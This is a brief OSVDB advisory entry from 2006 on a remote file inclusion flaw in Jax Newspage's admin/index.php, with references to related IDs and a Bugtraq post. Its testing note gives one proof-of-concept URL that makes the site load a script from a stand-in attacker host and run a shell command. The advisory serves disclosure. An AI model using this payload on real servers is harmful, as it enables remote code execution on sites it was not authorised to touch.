Jax Newspage admin/index.php path_to_script Variable Remote File Inclusion

2006-10-13T11:24:28
ID OSVDB:32435
Type osvdb
Reporter OSVDB
Modified 2006-10-13T11:24:28

Description

Manual Testing Notes

http://[target]/[PATH]/admin/index.php?path_to_script=http://[attacker]/cmd.gif?&cmd=ls

References:

Related OSVDB ID: 32434 Related OSVDB ID: 32436 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0208.html